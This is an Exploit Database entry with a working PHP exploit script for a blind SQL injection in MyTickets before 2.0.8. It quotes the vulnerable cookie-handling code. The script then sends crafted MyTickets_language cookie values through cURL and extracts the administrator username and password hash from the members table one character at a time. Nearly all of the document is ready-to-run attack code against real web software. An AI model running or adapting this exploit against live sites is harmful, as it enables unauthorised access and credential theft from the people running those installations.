MyTickets 1.x < 2.0.8 - Blind SQL Injection

• Exploit Database
• 111 阅读

• 作者： al-swisre
  日期： 2012-06-18
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/19264/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109

  <?php /* --------------------------------------------------------------- MyTickets <=Remote Blind SQL Injection Exploit by al-swisre ---------------------------------------------------------------   author...............: al-swisre mail.................: oy3[at]hotmail[dot]com software link........: http://phpx3.com/scripts.html#mytickets affected versions....: from 1 to 2.0.8     [-] Vulnerable code in include/system/general/define.php:   43.if(empty($cookies[&apos;language&apos;])){ 44. setcookie(&apos;MyTickets_language&apos;,$setting[&apos;default_language&apos;],time()+86400,"/"); 45. $language = $setting[&apos;default_language&apos;]; 46. }else{ 47. if($db->count(&apos;languages&apos;,"<code>id</code>=&apos;".$cookies[&apos;language&apos;]."&apos;") == 0){ 48.$language = $setting[&apos;default_language&apos;]; 49. } 50. $language = $cookies[&apos;language&apos;]; 52.} 52. 53.$language_array = $db->fetch($db->query("SELECT * FROM <code>languages</code> WHERE <code>id</code>=&apos;".$language."&apos;"));     */     print "\n+--------------------------------------------------------------------+"; print "\n| MyTickets <= Remote Blind SQL Injection Exploit by al-swisre |"; print "\n+--------------------------------------------------------------------+\n";     if (!extension_loaded(&apos;curl&apos;)) die("cURL extension required\n"); error_reporting(E_ERROR); set_time_limit(0);     function get($url,$inj) {   $curl = curl_init(); curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,3); curl_setopt($curl,CURLOPT_URL,$url); curl_setopt($curl, CURLOPT_COOKIE, "MyTickets_language=1$inj"); curl_setopt($curl, CURLOPT_HEADER, 1); curl_setopt($curl, CURLOPT_VERBOSE, 0); $calis = curl_exec($curl); @curl_close($calis); return $calis;     }   function chek_get($connect) {   if(eregi("include",$connect)) { return false; } else { return true; }   }     if ($argc < 2) { print "\nUsage......: php $argv[0] <url>\n"; print "\nExample....: php $argv[0] http://localhost/mytickets/"; print "\nExample....: php $argv[0] http://localhost/mytickets/\n"; die(); }   $sql_f = chek_get(get($argv[1],"&apos; and 1=&apos;2 /*")); $sql_t = chek_get(get($argv[1],"&apos; and 1=&apos;1 /*"));     if($sql_t == $sql_f) {   print "\n\t sorry: magic_quotes_gpc = On ): \n"; die(); }   print "\n\t[+] Getting Admin Username and Password\n\n\t";       for ($g = 1; $g <= 40; $g++) {//eidt for ($i = 46; $i <= 122; $i++) {   $inject = chek_get(get($argv[1],"&apos;+AnD+ascii(MiD((sElect+concat_ws(0x3a,username,password)+frOm+members+liMit 0,1),".$g.",1))=&apos;".$i."/*"));   if($inject == true){printchr($i);} } }         ?>